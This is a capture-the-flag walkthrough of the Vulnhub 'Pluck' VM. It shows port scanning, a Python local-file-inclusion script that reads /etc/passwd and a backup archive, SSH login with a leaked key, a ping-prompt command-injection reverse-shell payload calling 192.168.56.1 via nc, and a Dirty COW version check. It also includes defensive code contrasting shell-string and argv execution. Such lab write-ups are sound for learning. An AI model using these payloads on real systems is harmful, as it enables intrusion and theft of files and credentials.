Introduction
Pluck is a new boot2root-style VM: launch it and get root! You can find it on Vulnhub.
Discovery
Scan all the TCP ports first (-p-), then run service and OS detection (-A) on the open ones:
$ sudo nmap -p- 192.168.56.101
Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-20 14:14 CET
Nmap scan report for 192.168.56.101
Host is up (0.00056s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
5355/tcp open unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
$ sudo nmap -p22,80,3306,5355 192.168.56.101 -A
Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-20 14:14 CET
Nmap scan report for 192.168.56.101
Host is up (0.00018s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_ 256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open mysql MySQL (unauthorized)
5355/tcp open unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.18 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.55 seconds
Gaining access
Let’s have a look at the HTTP service.


Oh, the page is loaded through "?page=about.php"? Why not try a local file inclusion, with something like /etc/passwd as the page parameter?

It works! For better visibility (and fun), we can drive the LFI with a small Python script that wraps the target in the php://filter wrapper (convert.base64-encode): the include then returns the file base64-encoded instead of executing or rendering it, which is also the only way to read PHP sources such as index.php or admin.php intact. The script decodes the output.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
import re
import sys

import requests

# php://filter returns the included file base64-encoded instead of
# executing it, so PHP sources come back intact and binaries survive.
url = "http://192.168.56.101/index.php?page=php://filter/read=convert.base64-encode/resource="
file_lfi = "/etc/passwd"
fullurl = url + file_lfi

req = requests.get(fullurl)
# index.php renders the included content inside the jumbotron div
res = re.findall('<div class=jumbotron>(.*)</div><br>', req.text)
if not res:
    sys.exit("no jumbotron block found: missing file, or not readable by www-data?")
output = base64.b64decode(res[0])  # bytes, so this works for text and for tar files
sys.stdout.write(output.decode('utf-8', 'replace'))

# # Write command (binary-safe, for files such as backup.tar)
# with open('backup.tar', 'wb') as f:
#     f.write(output)
Exploiting the LFI
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
/etc/passwd output
We can see something unusual at the end of the file: "backups easier,,,:/backups:/usr/local/scripts/backup.sh". The login shell of backup-user is a script, so every login as that user runs a backup. To get the content of the script, just change the "file_lfi" variable in the Python script to /usr/local/scripts/backup.sh:
#!/bin/bash
########################
# Server Backup script #
########################
#Backup directories in /backups so we can get it via tftp
echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo "Backup complete"
Two directories (/home and /var/www/html) are archived into /backups/backup.tar. Let's grab it through the LFI (uncomment the last lines of the Python script to write it where you want). Side note: the script's comment mentions tftp, and the nmap -p- scan above was TCP-only, so a UDP scan of port 69 would be worth a look as an alternative way to fetch the archive.
$ file backup.tar
backup.tar: POSIX tar archive (GNU)
$ tar tvf backup.tar
drwxr-xr-x root/root 0 2017-01-18 09:27 home/
drwxr-xr-x bob/bob 0 2017-01-18 13:43 home/bob/
-rw-r--r-- bob/bob 3771 2017-01-18 06:39 home/bob/.bashrc
-rw-r--r-- bob/bob 0 2017-01-18 09:40 home/bob/.sudo_as_admin_successful
-rw-r--r-- bob/bob 655 2017-01-18 06:39 home/bob/.profile
-rw-r--r-- bob/bob 220 2017-01-18 06:39 home/bob/.bash_logout
drwxr-xr-x paul/paul 0 2017-01-18 19:13 home/paul/
drwxrwxr-x paul/paul 0 2017-01-18 19:09 home/paul/keys/
-rwxrwxr-x paul/paul 600 2017-01-18 19:08 home/paul/keys/id_key3.pub
-rwxrwxr-x paul/paul 600 2017-01-18 19:08 home/paul/keys/id_key2.pub
-rwxrwxr-x paul/paul 672 2017-01-18 19:08 home/paul/keys/id_key2
-rwxrwxr-x paul/paul 392 2017-01-18 19:09 home/paul/keys/id_key4.pub
-rwxrwxr-x paul/paul 600 2017-01-18 19:08 home/paul/keys/id_key5.pub
-rwxrwxr-x paul/paul 1675 2017-01-18 19:09 home/paul/keys/id_key6
-rwxrwxr-x paul/paul 668 2017-01-18 19:08 home/paul/keys/id_key1
-rwxrwxr-x paul/paul 668 2017-01-18 19:08 home/paul/keys/id_key5
-rwxrwxr-x paul/paul 600 2017-01-18 19:08 home/paul/keys/id_key1.pub
-rwxrwxr-x paul/paul 392 2017-01-18 19:09 home/paul/keys/id_key6.pub
-rwxrwxr-x paul/paul 1679 2017-01-18 19:09 home/paul/keys/id_key4
-rwxrwxr-x paul/paul 668 2017-01-18 19:08 home/paul/keys/id_key3
-rw-r--r-- paul/paul 3771 2017-01-18 09:04 home/paul/.bashrc
-rw-r--r-- paul/paul 655 2017-01-18 09:04 home/paul/.profile
-rw-r--r-- paul/paul 220 2017-01-18 09:04 home/paul/.bash_logout
drwxr-xr-x peter/peter 0 2017-01-18 09:04 home/peter/
-rw-r--r-- peter/peter 3771 2017-01-18 09:04 home/peter/.bashrc
-rw-r--r-- peter/peter 655 2017-01-18 09:04 home/peter/.profile
-rw-r--r-- peter/peter 220 2017-01-18 09:04 home/peter/.bash_logout
drwxr-xr-x root/root 0 2017-01-18 19:28 var/www/html/
drwxr-xr-x root/root 0 2016-07-25 15:53 var/www/html/fonts/
-rw-r--r-- root/root 108738 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.svg
-rw-r--r-- root/root 18028 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.woff2
-rw-r--r-- root/root 45404 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.ttf
-rw-r--r-- root/root 23424 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.woff
-rw-r--r-- root/root 20127 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.eot
-rw-r--r-- root/root 589 2017-01-18 18:16 var/www/html/about.php
-rw-r--r-- root/root 1427 2017-01-18 19:28 var/www/html/index.php
-rw-r--r-- root/root 241 2017-01-18 16:10 var/www/html/footer.php
drwxr-xr-x root/root 0 2016-07-25 15:53 var/www/html/css/
-rw-r--r-- root/root 389287 2016-07-25 15:53 var/www/html/css/bootstrap.css.map
-rw-r--r-- root/root 542194 2016-07-25 15:53 var/www/html/css/bootstrap.min.css.map
-rw-r--r-- root/root 26132 2016-07-25 15:53 var/www/html/css/bootstrap-theme.css
-rw-r--r-- root/root 23409 2016-07-25 15:53 var/www/html/css/bootstrap-theme.min.css
-rw-r--r-- root/root 121200 2016-07-25 15:53 var/www/html/css/bootstrap.min.css
-rw-r--r-- root/root 25648 2016-07-25 15:53 var/www/html/css/bootstrap-theme.min.css.map
-rw-r--r-- root/root 47706 2016-07-25 15:53 var/www/html/css/bootstrap-theme.css.map
-rw-r--r-- root/root 146010 2016-07-25 15:53 var/www/html/css/bootstrap.css
-rw-r--r-- root/root 1492 2017-01-18 17:09 var/www/html/header.php
-rw-r--r-- root/root 1486 2017-01-18 18:24 var/www/html/admin.php
drwxr-xr-x root/root 0 2017-01-18 16:08 var/www/html/js/
-rw-r--r-- root/root 97163 2016-12-20 19:17 var/www/html/js/jquery.min.js
-rw-r--r-- root/root 69707 2016-07-25 15:53 var/www/html/js/bootstrap.js
-rw-r--r-- root/root 484 2016-07-25 15:53 var/www/html/js/npm.js
-rw-r--r-- root/root 37045 2016-07-25 15:53 var/www/html/js/bootstrap.min.js
Wow, lots of id_key files, and an SSH server is up 🙂 Trying them all as paul, only id_key4 works. The sizes already give a hint before trying blind: id_key4 (1679 bytes) and id_key6 (1675 bytes) are the usual size of a 2048-bit RSA private key in PEM, while the 668/672-byte files are too short to be complete keys; comparing each private key's fingerprint (ssh-keygen -lf) with the .pub files would narrow it down further.
$ ssh paul@192.168.56.101 -i id_key4
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0755 for 'id_key4' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_key4": bad permissions
paul@192.168.56.101's password:
SSH key refused: bad permissions
Oops, bad perms! ssh ignores a private key readable by others (the files came out of the tar with mode 0775), so chmod 600 id_key4 and retry.
W00t! Connected... but stuck in a pdmenu :/ (no surprise: /etc/passwd listed /usr/bin/pdmenu as paul's login shell).

Escape PDMENU / Reverse shell access
With this menu, we can list and browse directories, edit files (if we have the permissions, of course), browse with lynx, ping a host or open a telnet connection. Every time I see a prompt that accepts a host for a ping command, I think "command injection" :-). Here we go:


Reverse shell time! Start a netcat listener on the attacker box (192.168.56.1, port 8081) and answer the ping prompt with the following payload. The leading "1;" terminates ping's host argument, and everything inside the backticks runs as a separate command: a named pipe feeds an interactive /bin/sh whose output goes through nc back to the listener.
1;`mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 8081 >/tmp/f`
Reverse shell payload
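Why the ping prompt is injectable, as an added illustration (this is not code from the writeup, nor pdmenu's own code): a minimal model of a menu entry that asks for a host and runs a command with it. The vulnerable version builds one string and hands it to /bin/sh, which is where ";" and backticks get interpreted; the safe version passes the host as a single argv element and validates it first. "echo" stands in for ping so it runs offline, the benign payload and the hostname allow-list are constructed for this example, and the function names are ours.

```python
#!/usr/bin/env python3
"""Command injection through a 'ping <host>' prompt: shell string vs. argv.

'echo' replaces 'ping' so the demonstration runs without network access;
what matters is how the host string reaches the command.
"""
import re
import subprocess

# Constructed, harmless payload with the same shape as the real one:
# a host argument cut short by ';' followed by a second command.
CONSTRUCTED_PAYLOAD = "1; echo INJECTED"

# The actual payload from the writeup, kept only to show the validator
# rejects it; it is never executed here.
WRITEUP_PAYLOAD = "1;`mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 8081 >/tmp/f`"

# Allow-list: IPv4 dotted quad or a plain DNS name. Shell metacharacters
# (';', '`', '|', '$', spaces) can never match, so they never reach a shell.
_HOST_RE = re.compile(
    r"^(?:\d{1,3}(?:\.\d{1,3}){3}"
    r"|[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?)$"
)


def is_valid_host(host: str) -> bool:
    """True only for something that looks like an IPv4 address or hostname."""
    return bool(_HOST_RE.match(host))


def ping_vulnerable(host: str) -> str:
    """Builds one command line and runs it through /bin/sh, as a shell-driven
    menu does when it substitutes the user's answer into a command string.
    The shell parses ';', backticks and pipes inside 'host'."""
    cmd = "echo ping -c 1 " + host  # 'echo' stands in for 'ping'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_argv(host: str) -> str:
    """No shell: the host is a single argv element, so metacharacters are
    just bytes inside one argument and no second command can run."""
    argv = ["echo", "ping", "-c", "1", host]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def ping_safe(host: str) -> str:
    """argv form plus input validation: reject anything that is not a host."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ping_argv(host)


def injected(output: str) -> bool:
    """True when the payload's second command actually executed."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    print("shell string :", ping_vulnerable(CONSTRUCTED_PAYLOAD).rstrip())
    print("argv list    :", ping_argv(CONSTRUCTED_PAYLOAD).rstrip())
    print("valid host?  :", is_valid_host(WRITEUP_PAYLOAD))
```

Run it and the shell-string version prints a second line, INJECTED, because /bin/sh executed two commands; the argv version prints the whole payload as one literal argument to the stand-in command. The menu on Pluck behaves like the first function, which is exactly why the writeup's payload, with backticks in place of the second "echo", yields a shell.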

Gaining root access / Privilege escalation
How do we get root? First, what kernel and what OS are we dealing with?
$ uname -a
Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.10
DISTRIB_CODENAME=yakkety
DISTRIB_DESCRIPTION="Ubuntu 16.10"
NAME="Ubuntu"
VERSION="16.10 (Yakkety Yak)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.10"
VERSION_ID="16.10"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="http://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=yakkety
UBUNTU_CODENAME=yakkety
Information Gathering - Kernel/OS
What about Dirty COW (CVE-2016-5195)? The Ubuntu kernel packages that carry the fix are:
Patched kernel versions (Ubuntu)
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
The running kernel is 4.8.0-22 on Ubuntu 16.10, older than the patched 4.8.0-26.28, so Pluck should be vulnerable. Exploit!
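The comparison just made by eye, as an added example that is not part of the original writeup: a small checker that parses an Ubuntu kernel version as printed by uname -r and compares it with the patched package versions listed above. The patched-version table is the one quoted on the page; the parsing rules, the sample inputs (taken from the uname and lsb-release output above) and the function names are ours. It also handles the two cases where uname alone cannot decide: a different upstream base (e.g. an HWE kernel) and an identical ABI number, since uname -r does not show the upload number.

```python
#!/usr/bin/env python3
"""Is this Ubuntu kernel older than the Dirty COW (CVE-2016-5195) fix?"""
import re

# Patched Ubuntu kernel package versions, as listed in the post.
PATCHED = {
    "16.10": "4.8.0-26.28",
    "16.04": "4.4.0-45.66",
    "14.04": "3.13.0-100.147",
    "12.04": "3.2.0-113.155",
}

# Sample input constructed from the uname -r / lsb-release output on Pluck.
UNAME_R = "4.8.0-22-generic"
DISTRIB_RELEASE = "16.10"

# Ubuntu kernel versions: upstream major.minor.patch, '-ABI', an optional
# '.upload' number (package versions only) and an optional flavour suffix.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)(?:\.(\d+))?(?:-([a-z0-9-]+))?$")


def parse_ubuntu_kernel(version: str) -> tuple:
    """'4.8.0-22-generic' -> (4, 8, 0, 22); '4.8.0-26.28' -> (4, 8, 0, 26).

    Only (major, minor, patch, ABI) is returned because uname -r never shows
    the upload number, so that is the most that can be compared reliably.
    """
    m = _VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised Ubuntu kernel version: {version!r}")
    return tuple(int(m.group(i)) for i in range(1, 5))


def is_vulnerable(uname_r: str, release: str):
    """True if the running ABI is older than the fixed package's ABI,
    False if newer, None when uname -r alone cannot decide."""
    if release not in PATCHED:
        return None  # no reference version for this release
    running = parse_ubuntu_kernel(uname_r)
    fixed = parse_ubuntu_kernel(PATCHED[release])
    if running[:3] != fixed[:3]:
        return None  # different upstream base (HWE kernel, custom build): table row does not apply
    if running[3] == fixed[3]:
        return None  # same ABI: the upload number decides, and uname does not show it
    return running[3] < fixed[3]


def verdict(uname_r: str, release: str) -> str:
    """Human-readable summary for the shell on the target."""
    v = is_vulnerable(uname_r, release)
    if v is None:
        return (f"{uname_r} on Ubuntu {release}: cannot decide from uname -r alone, "
                f"check the installed linux-image package version")
    state = "older than" if v else "at or newer than"
    outcome = "likely vulnerable" if v else "patched"
    return f"{uname_r} on Ubuntu {release}: {state} fix {PATCHED[release]} -> {outcome}"


if __name__ == "__main__":
    print(verdict(UNAME_R, DISTRIB_RELEASE))
```

For Pluck it reports 4.8.0-22 as older than 4.8.0-26.28, matching the manual reading. Treat the result as a hint rather than proof: a kernel version says nothing about live patching or a vendor backport, so the real test is still the exploit itself.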

Got root 😉